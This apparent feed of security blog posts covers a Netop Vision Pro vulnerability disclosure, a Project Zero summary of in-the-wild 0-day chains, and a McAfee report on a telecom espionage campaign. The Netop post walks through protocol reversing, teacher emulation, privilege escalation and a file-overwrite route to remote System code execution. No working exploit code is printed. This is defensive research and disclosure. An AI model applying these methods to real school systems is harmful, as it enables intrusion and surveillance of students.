Since there is no encryption, these images were sent in the clear. Anyone on the local network could eavesdrop on these images and view the contents of the students’ screens remotely. A new screenshot was sent every few seconds, providing the teacher and any eavesdroppers a near-real time stream of each student’s computer. To capture and view these images, all we had to do was set our network card to promiscuous mode (https://www.computertechreviews.com/definition/promiscuous-mode/) and use a tool like Driftnet (https://github.com/deiv/driftnet). These two steps allowed us to capture the images passed over the network and view every student screen while they were connected to a classroom. The image in Figure 4 is showing a screenshot captured from Driftnet. This led us to file our first vulnerability disclosed as CVE-2021-27194, referencing “CWE-319: Cleartext Transmission of Sensitive Information” for this finding. As pointed out earlier, the teacher and the student clients will communicate directly over the local network. The only way an eavesdropper could access the unencrypted data would be by sniffing the traffic on the same local network as the students.

Figure 4: Image of student’s desktop captured from Driftnet over the network

Fuzzing the Broadcast Messages

With the goal of remote code execution on the students’ computers, we began to dissect the first network packet, which the teacher sends to the students, telling them to connect to the classroom. This was a UDP message sent from the teacher to all the students and can be seen in Figure 5.

Figure 5: Wireshark capture of teacher’s UDP message

The purpose of this packet is to let the student client software know where to find the teacher computer on the network. Because this UDP message is sent to all students in a broadcast style and requires no handshake or setup like TCP, this was a good place to start poking at.

We created a custom Scapy layer (https://scapy.readthedocs.io/en/latest/api/scapy.layers.html) (Figure 6) from the UDP message seen in Figure 5 to begin dissecting each field and crafting our own packets. After a few days of fuzzing with UDP packets, we were able to identify two things. First, we observed a lack of length checks on strings and second, random values sent by the fuzzer were being written directly to the Windows registry. The effect of these tests can easily be seen in Figure 7.

Figure 6: UDP broadcast message from teacher

Even with these malformed entries in the registry (Figure 7) we never observed the application crashing or responding unexpectedly. This means that even though the application wasn’t handling our mutated packet properly, we never overwrote anything of importance or crossed a string buffer boundary.

Figure 7: Un-sanitized characters being written to the Registry

To go further we needed to send the next few packets that we observed from our network capture (Figure 8). After the first UDP message, all subsequent packets were TCP. The TCP messages would negotiate a connection between the student and the teacher and would keep the socket open for the duration of the classroom connection. This TCP negotiation exchange was a transfer of 11 packets, which we will call the handshake.

Figure 8: Wireshark capture of a teacher starting class

Reversing the Network Protocol

To respond appropriately to the TCP connection request, we needed to emulate how a valid teacher would respond to the handshake; otherwise, the student would drop the connection. We began reverse engineering the TCP network traffic and attempted to emulate actual “teacher” traffic. After capturing a handful of packets, the payloads started to conform to roughly the same format. Each started with the size of the packet and the string “T125”. There were three packets in the handshake that contained fields that were changing between each classroom connection. In total, four changing fields were identified.

The first field was the session_id, which we identified in IDA and is shown in the UDP packet from Figure 6. From our fuzzing exercise with the UDP packet, we learned if the same session_id was reused multiple times, the student would still respond normally, even though the actual network traffic we captured would often have a unique session_id.

This left us three remaining dynamic fields which we identified as a teacher token, student token, and a unique unknown DWORD (8 bytes). We identified two of these fields by setting up multiple classrooms with different teacher and student computers and monitoring these values. The teacher token was static and unique to each teacher. We discovered the same was true with the student token. This left us with the unique DWORD field that was dynamic in each handshake. This last field at first seemed random but was always in the same relative range. We labeled this as “Token3” for much of our research, as seen in Figure 9 below.

Figure 9: Python script output identifying “Token3”

Eventually, while using WinDbg to perform dynamic analysis, the value of Token3 started to look familiar. We noticed it matched the range of memory being allocated for the heap. This can be seen in Figure 10.

Figure 10: WinDbg address space analysis from a student PC

By combining our previous understanding of the UDP broadcast traffic with our ability to respond appropriately to the TCP packets with dynamic fields, we were able to successfully emulate a teacher’s workstation. We demonstrated this by modifying our Python script with this new information and sending a request to connect with the student. When a student connects to a teacher it displays a message indicating a successful connection has been made. Below are two images showing a teacher connecting (Figure 11) and our Python script connecting (Figure 12). Purely for demonstration purposes, we have named our attack machine “hacker”, and our classroom “hacker-room.”

Figure 11: Emulation of a teacher successful

Figure 12: Emulated teacher connection from Python script

To understand the process of reverse engineering the network traffic in more detail, McAfee researchers Douglas McKee and Ismael Valenzuela have released an in-depth talk on how to hack proprietary protocols like the one used by Netop. Their webinar goes into far more detail than this blog and can be viewed here.

Replaying a Command Action

Since we have successfully emulated a teacher’s connection using Python, for clarity we will refer to ourselves as the attacker and a legitimate connection made through Netop as the teacher.

Next, we began to look at some of the actions that teachers can perform and how we could take advantage of them. One of the actions that a teacher can perform is starting applications on the remote students’ PCs. In the teacher suite, the teacher is prompted with the familiar Windows Run prompt, and any applications or commands set to run are executed on the student machines (Figure 13).

Figure 13: The teacher “Run Application” prompt

Looking at the network traffic (shown in Figure 14), we were hoping to find a field in the packet that could allow us to deviate from what was possible using the teacher client. As we mentioned earlier, everything is in plaintext, making it quite easy to identify which packets were being sent to execute applications on the remote systems by searching within Wireshark.

Figure 14: Run “calc” packet

Before we started to modify the packet that runs applications on the student machines, we first wanted to see if we could replay this traffic successfully. As you can see in the video below, our Python script was able to run PowerShell followed by Windows Calculator on each of the student endpoints. This is showcasing that even valid teacher actions can still be useful to attackers.

The ability for an attacker to emulate a teacher and execute arbitrary commands on the students’ machines brings us to our second CVE. CVE-2021-27195 was filed for “CWE-863: Incorrect Authorization” since we were able to replay modified local network traffic.

When the teacher sends a command to the student, the client would drop privileges to that of the logged-in student and not keep the original System privileges. This meant that if an attacker wanted unrestricted access to the remote system, they could not simply replay normal traffic, but instead would have to modify each field in the traffic and observe the results.

In an attempt to find a way around the privilege reduction during command execution, we continued fuzzing all fields located within the “run command” packet. This proved unsuccessful as we were unable to find a packet structure that would prevent the command from lowering privileges. This required a deeper dive into the code in handling the remote command execution processed on the student endpoint. By tracing the execution path within IDA, we discovered there was in fact a path that allows remote commands to execute without dropping privileges, but it required a special case, as shown in Figure 15.

Figure 15: IDA graph view showing alternate paths of code execution

Figure 16: Zoomed in image of the ShellExecute code path

The code path that bypasses the privilege reduction and goes directly to “ShellExecute” was checking a variable that had its value set during startup. We were not able to find any other code paths that updated this value after the software started. Our theory is this value may be used during installation or uninstallation, but we were not able to legitimately force execution to the “ShellExecute” path.

This code path to “ShellExecute” made us wonder if there were other similar branches like this that could be reached. We began searching the disassembled code in IDA for calls not wrapped with code resulting in lower privileges. We found four cases where the privileges were not reduced, however none of them were accessible over the network. Regardless, they still could potentially be useful, so we investigated each. The first one was used when opening Internet Explorer (IE) with a prefilled URL. This turned out to be related to the support system. Examining the user interface on the student machine, we discovered a “Technical Support” button which was found in the Netop “about” menu.

When the user clicks on the support button, it opens IE directly into a support web form. The issue, however, is privileges are never dropped, resulting in the IE process being run as System because the Netop student client is also run as System. This can be seen in Figure 11. We filed this issue as our third CVE, CVE-2021-27192 referencing “CWE-269: Incorrect Privilege Assignment”.

Figure 17: Internet Explorer running as System

There are a handful of well-documented ways to get a local elevation of privilege (LPE) using only the mouse when the user has access to an application running with higher privileges. We used an old technique which uses the “Save as” button to navigate to the folder where cmd.exe is located and execute it. The resulting CMD process inherits the System privileges of the parent process, giving the user a System-level shell.

While this LPE was exciting, we still wanted to find something with a remote attack vector and utilize our Python script to emulate teacher traffic. We decided to take a deeper dive into the network traffic to see what we could find. Simulating an attacker, we successfully emulated the following:

  • Remote CMD execution
  • Screen blank the student
  • Restart Netop
  • Shutdown the computer
  • Block web access to individual websites
  • Unlock the Netop properties (on student computer)

During the emulation of all the above actions we performed some rudimentary fuzzing on various fields of each and discovered six crashes which caused the Netop student install to crash and restart. We were able to find two execution violations, two read violations, one write exception, and one kernel exception. After investigation, we determined these crashes were not easily exploitable and therefore a lower priority for deeper investigation. Regardless, we reported them to Netop along with all other findings.

Exploring Plugins

Netop Vision Pro comes with a handful of plugins installed by default, which are used to separate different functionality from the main Netop executable. For example, to enable the ability for the teacher and student to instant message (IM) each other, the MChat.exe plugin is used. With a similar paradigm to the main executable, the students should not be able to stop these plugins, so they too run as System, making them worth exploring.

Mimicking our previous approach, we started to look for “ShellExecute” calls within the plugins and eventually discovered three more privilege escalations, each of which were conducted in a comparable way using only the mouse and bypassing restrictive file filters within the “Save as” windows. The MChat.exe, SSView.exe (Screen Shot Viewer), and the About page’s “System Information” windows all had a similar “Save as” button, each resulting in simple LPEs with no code or exploit required. We added each of these plugins under the affected versions field on our third CVE, CVE-2021-27192, mentioned above.

We were still searching for a method to achieve remote code execution and none of the “ShellExecute” calls used for the LPEs were accessible over the network. We started to narrow down the plugins that pass user supplied data over the network. This directed our attention back to the MChat plugin. As part of our initial recon for research projects, we reviewed change logs looking for any relevant security changes. During this review we noted an interesting log pertaining to the MChat client as seen in Figure 13.

 

Figure 18: Change log from Netop.com

The Chat function runs as System, like all the plugins, and can send text or files to the remote student computer. An attacker can always use this functionality to their advantage by either overwriting existing files or enticing a victim to click on a dropped executable. Investigating how the chat function works and specifically how files are sent, we discovered that the files are pushed to the student computers without any user interaction from the student. Any files pushed by a teacher are stored in a “work directory”, which the student can open from the IM window. Prior to the latest release it would have been opened as System; this was fixed as referenced in Figure 18. Delving deeper into the functionality of the chat application, we found that the teacher also has the ability to read files in the student’s “work directory” and delete files within it. Due to our findings demonstrated with CVE-2021-27195, we can leverage our emulation code as an attacker to write, read, and delete files within this “work directory” from a remote attack vector on the same local network. This ability to read and write files accounted for the last CVE that we filed, CVE-2021-27193 referencing “CWE-276: Incorrect Default Permissions,” with the overall highest CVSS score of 9.5.

In order to determine if the MChat plugin would potentially give us System-level access, we needed to investigate if the plugin’s file operations were restricted to the student’s permissions or if the plugin inherited the System privileges from the running context. Examining the disassembled code of the MChat plugin, as displayed in Figure 14, we learned that all file actions on the student computer are executed with System privileges. Only after the file operation finishes will the permissions be set to allow access for everyone, essentially the effect of using the Linux “chmod 777” command, to make the files universally read/writable.

Figure 19: IDA screenshot of MChat file operations changing access to everyone

To validate this, we created several test files using an admin account and restricted the permissions to disallow the student from modifying or reading the test files. We proceeded to load the teacher suite, and through an MChat session confirmed we were able to read, write, and delete these files. This was an exciting discovery; however, if the attacker is limited to the predetermined “work directory” they would be limited in the effect they could have on the remote target. To investigate if we could change the “work directory” we began digging around in the teacher suite. Hidden in a few layers of menus (Figure 20) we found that a teacher can indeed set the remote student’s “work directory” and update this remotely. Knowing we can easily emulate any teacher’s command means that we could modify the “work directory” anywhere on the student system. Based on this, an attacker leveraging this flaw could have System access to modify any file on the remote PC.

Figure 20: Changing the remote student path from a teacher’s client

Reversing MChat Network Traffic

Now that we knew that the teacher could overwrite any file on the system, including system executables, we wanted to automate this attack and add it to our Python script. By automating this we want to showcase how attackers can use issues like this to create tools and scripts that have real world impacts. For a chat session to begin, we had to initiate the 11-packet handshake we previously discussed. Once the student connected to our attack machine, we needed to send a request to start a chat session with the target student. This request would make the student respond using TCP, yet this time, on a separate port, initiating an MChat seven-packet handshake. This required us to reverse engineer this new handshake format in a similar approach as described earlier. Unlike the first handshake, the MChat handshake had a single unique identifier for each session, and after testing, it was determined that the ID could be hardcoded with a static value without any negative effects.

Finally, we wanted to overwrite a file that we could ensure would be executed with System privileges. With the successful MChat handshake complete we needed to send a packet that would change the “work directory” to that of our choosing. Figure 21 shows the packet as a Scapy layer used to change the work directory on the student’s PC. The Netop plugin directory was a perfect target directory to change to since anything executed from this directory would be executed as System.

Figure 21: Change working directory on the student PC

The last step in gaining System-level execution was to overwrite and execute one of the plugins with a “malicious” binary. Through testing we discovered that if the file already exists in the same directory, the chat application is smart enough to not overwrite it, but instead adds a number to the filename. This is not what we wanted since the original plugin would get executed instead of our “malicious” one. This meant that we had to also reverse engineer a packet containing commands that are used to delete files. The Scapy layer used to delete a file and save a new one is shown in Figure 22.

Figure 22: Python Scapy layers to “delete” (MChatPktDeleteFile)  and “write” (MChatPkt6) files

With these Scapy layers we were able to replace the target plugin with a binary of our choosing, keeping the same name as the original plugin. We chose the “SSView.exe” plugin, which is a plugin used to show screenshots on the student’s computer. To help visualize this entire process please reference Figure 23.

Figure 23: An attack flow using the MChat plugin to overwrite an executable

Now that the SSView.exe plugin has been overwritten, triggering this plugin will execute our attacker-supplied code. This execution will inherit the Netop System privileges, and all can be conducted from an unauthenticated remote attack vector.

Impact

It is not hard to imagine a scenario where a culmination of these issues can lead to several negative outcomes. The largest impact being remote code execution of arbitrary code with System privileges from any device on the local network. This scenario has the potential to be wormable, meaning that the arbitrary binary that we run could be designed to seek out other devices and further the spread. In addition, if the “Open Enrollment” option for a classroom is configured, the Netop Vision Pro student client broadcasts its presence on the network every few seconds. This can be used to an attacker’s advantage to determine the IP addresses of all the students connected on the local network. As seen in Figure 24, our Python script sniffed for student broadcast messages for 5 seconds and found all three student computers on the same network. Because these broadcast messages are sent out to the entire local network, this could very well scale to an entire school system.

Figure 24: Finding all students on the local network.

With a list of computers running the student software, an attacker can then issue commands to each one individually to run arbitrary code with System privileges. In the context of hybrid and e-learning it is important to remember that this software on the student’s computer doesn’t get turned off. Because it is always running, even when not in use, this software assumes every network the device connects to could have a teacher on it and begins broadcasting its presence. An attacker doesn’t have to compromise the school network; all they need is to find any network where this software is accessible, such as a library, coffee shop, or home network. It doesn’t matter where one of these student’s PCs gets compromised as a well-designed malware could lay dormant and scan each network the infected PC connects to, until it finds other vulnerable instances of Netop Vision Pro to further propagate the infection.

Once these machines have been compromised the remote attacker has full control of the system since they inherit the System privileges. Nothing at this point could stop an attacker running as System from accessing any files, terminating any process, or reaping havoc on the compromised machine. To elaborate on the effects of these issues we can propose a few scenarios. An attacker could use the discoverability of these machines to deploy ransomware to all the school computers on the network, bringing the school or entire school district to a standstill. A stealthier attacker could silently install keylogging software and monitor screenshots of the students which could lead to social media or financial accounts being compromised. Lastly, an attacker could monitor webcams of the students, bridging the gap from compromised software to the physical realm. As a proof of concept, the video below will show how an attacker can put CVE-2021-27195 and CVE-2021-27193 together to find, exploit, and monitor the webcams of each computer running Netop Vision Pro.

Secure adaptation of software is much easier to achieve when security is baked in from the beginning, rather than an afterthought. It is easy to recognize when software is built for “safe” environments. While Netop Vision Pro was never intended to be internet-facing or be brought off a managed school network, it is still important to implement basic security features like encryption. While designing software one should not assume what will be commonplace in the future. For instance, when this software was originally developed the concept of remote learning or hybrid learning was a far-out idea but now seems like it will be a norm. When security decisions are integrated from inception, software can adapt to new environments while keeping users better protected from future threats.

Disclosure and Recommended Mitigations

We disclosed all these findings to Netop on December 11, 2020 and heard back from them shortly after. Our disclosure included recommendations for implementing encryption of all network traffic, adding authentication, and verification of teachers to students, and more precise packet parsing filters. In Netop Vision Pro 9.7.2, released in late February, Netop has fixed the local privilege escalations, encrypted formerly plaintext Windows credentials, and mitigated the arbitrary read/writes on the remote filesystem within the MChat client. The local privilege escalations were fixed by running all plugins as the student and no longer as System. This way, the “Save as” buttons are limited to the student’s account. The Windows credentials are now encrypted using RC4 before being sent over the network, preventing eavesdroppers from gathering account credentials. Lastly, since all the plugins are running as the student, the MChat client can no longer delete and replace system executables which successfully mitigates the attack shown in the impact section. The network traffic is still unencrypted, including the screenshots of the student computers but Netop has assured us it is working on implementing encryption on all network traffic for a future update. We’d like to recognize Netop’s outstanding response and rapid development and release of a more secure software version and encourage industry vendors to take note of this as a standard for responding to responsible disclosures from industry researchers.

The post Netop Vision Pro – Distance Learning Software is 20/20 in Hindsight appeared first on McAfee Blog.

In-the-Wild Series: October 2020 0-day discovery

By: Ryan
18 March 2021 at 16:45

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaign came back with the next iteration of their campaign: a couple dozen websites redirecting to an exploit server. Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. 

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

The diagram above shows the flow of a device connecting to one of the affected websites. The device is directed to either exploit server #1 or exploit server #2. The following exploits are then delivered based on the device and browser.

Exploit Server

Platform

Browser

Renderer RCE

Sandbox Escape

Local Privilege Escalation

1

iOS

Safari

Stack R/W via Type 1 Fonts (CVE-2020-27930)

Not needed

Info leak via mach message trailers (CVE-2020-27950)

Type confusion with turnstiles (CVE-2020-27932)

1

Windows

Chrome

Freetype heap buffer overflow

(CVE-2020-15999)

Not needed

cng.sys heap buffer overflow (CVE-2020-17087)

1

Android

** Note: This was only delivered after #2 went down and CVE-2020-15999 was patched.

Chrome

V8 type confusion in TurboFan (CVE-2020-16009)

Unknown

Unknown

2

Android

Chrome

Freetype heap buffer overflow

(CVE-2020-15999)

Chrome for Android head buffer overflow (CVE-2020-16010)

Unknown

2

Android

Samsung Browser

Freetype heap buffer overflow

(CVE-2020-15999)

Chromium n-day

Unknown

All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also lead us to believe that while the entities between exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also lends us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chains targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and privilege escalation exploit for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only devices we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down. Exploit server #1 stayed up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues - from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.

Conclusion

Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Operation Diànxùn: Cyberespionage Campaign Targeting Telecommunication Companies

16 March 2021 at 13:00
how to run a virus scan

In this report the McAfee Advanced Threat Research (ATR) Strategic Intelligence team details an espionage campaign, targeting telecommunication companies, dubbed Operation Diànxùn.

In this attack, we discovered malware using similar tactics, techniques and procedures (TTPs) to those observed in earlier campaigns publicly attributed to the threat actors RedDelta and Mustang Panda. While the initial vector for the infection is not entirely clear, we believe with a medium level of confidence that victims were lured to a domain under control of the threat actor, from which they were infected with malware which the threat actor leveraged to perform additional discovery and data collection. We believe with a medium level of confidence that the attackers used a phishing website masquerading as the Huawei company career page to target people working in the telecommunications industry.

We discovered malware that masqueraded as Flash applications, often connecting to the domain “hxxp://update.careerhuawei.net” that was under control of the threat actor. The malicious domain was crafted to look like the legitimate career site for Huawei, which has the domain: hxxp://career.huawei.com. In December, we also observed a new domain name used in this campaign: hxxp://update.huaweiyuncdn.com.

Moreover, the sample masquerading as the Flash application used the malicious domain name “flach.cn” which was made to look like the official web page for China to download the Flash application, flash.cn. One of the main differences from past attacks is the lack of use of the PlugX backdoor. However, we did identify the use of a Cobalt Strike backdoor.

 

By using McAfee’s telemetry, possible targets based in Southeast Asia, Europe, and the US were discovered in the telecommunication sector. We also identified a strong interest in GermanVietnamese and India telecommunication companies. Combined with the use of the fake Huawei site, we believe with a high level of confidence that this campaign was targeting the telecommunication sector. We believe with a moderate level of confidence that the motivation behind this specific campaign has to do with the ban of Chinese technology in the global 5G roll-out.

 

Activity linked to the Chinese group RedDelta, by peers in our industry, has been spotted in the wild since early May 2020. Previous attacks have been described targeting the Vatican and religious organizations.

In September 2020, the group continued its activity using decoy documents related to Catholicism, Tibet-Ladakh relations and the United Nations General Assembly Security Council, as well as other network intrusion activities targeting the Myanmar government and two Hong Kong universities. These attacks mainly used the PlugX backdoor using DLL side loading with legitimate software, such as Word or Acrobat, to compromise targets.

While external reports have given a new name to the group which attacked the religious institutions, we believe with a moderate level of confidence, based on the similarity of TTPs, that both attacks can be attributed to one known threat actor: Mustang Panda.

Coverage and Protection

We believe the best way to protect yourself from this type of attack is to adopt a multi-layer approach including MVISION Insights, McAfee Web Gateway, MVISION UCE and MVISION EDR.

MVISION Insights can play a key role in risk mitigation by proactively collecting intelligence on the threat and your exposure.

McAfee Web Gateway and MVISION UCE provide multi-layer web vector protection with URL Reputation check, SSL decryption, and malware emulation capabilities for analyzing dangerous active Web content such as Flash and DotNet. MVISION UCE also includes the capabilities of Remote Browser Isolation, the only solution that can provide 100% protection during web browsing.

McAfee Endpoint Security running on the target endpoint protects against Operation Dianxun with an array of prevention and detection techniques. ENS Threat Prevention and ATP provides both signature and behavioral analysis capability which proactively detects the threat. ENS also leverages Global Threat Intelligence which is updated with known IoCs. For DAT based detections, the family will be reported as Trojan-Cobalt, Trojan-FSYW, Trojan-FSYX, Trojan-FSZC and CobaltStr-FDWE.

As the last phase of the attack involves creating a backdoor for remote control of the victim via a Command and Control Server and Cobalt Strike Beacon, the blocking features that can be activated on a Next Generation Intrusion Prevention System solution such as McAfee NSP are important, NSP includes a Callback Detection engine and is able to detect and block anomalies in communication signals with C2 Servers.

MVISION EDR can proactively identify persistence and defense evasion techniques. You can also use MVISION EDR to search the indicators of compromise in Real-Time or Historically (up to 90 days) across enterprise systems.

Learn more about Operation Diànxùn, including Yara & Mitre ATT&CK techniques, by reading our technical analysis and Defender blog. 

Summary of the Threat

We assess with a high level of confidence that:

  • Recent attacks using TTPs similar to those of the Chinese groups RedDelta and Mustang Panda have been discovered.
  • Multiple overlaps including tooling, network and operating methods suggest strong similarities between Chinese groups RedDelta and Mustang Panda.
  • The targets are mainly telecommunication companies based in Southeast Asia, Europe, and the US. We also identified a strong interest in German and Vietnamese telecommunication companies.

We assess with a moderate level of confidence that:

  • We believe that this espionage campaign is aimed at stealing sensitive or secret information in relation to 5G technology.

PLEASE NOTE:  We have no evidence that the technology company Huawei was knowingly involved in this Campaign.

McAfee Advanced Threat Research (ATR) is actively monitoring this threat and will update as its visibility into the threat increases.

The post Operation Diànxùn: Cyberespionage Campaign Targeting Telecommunication Companies appeared first on McAfee Blog.

❌
❌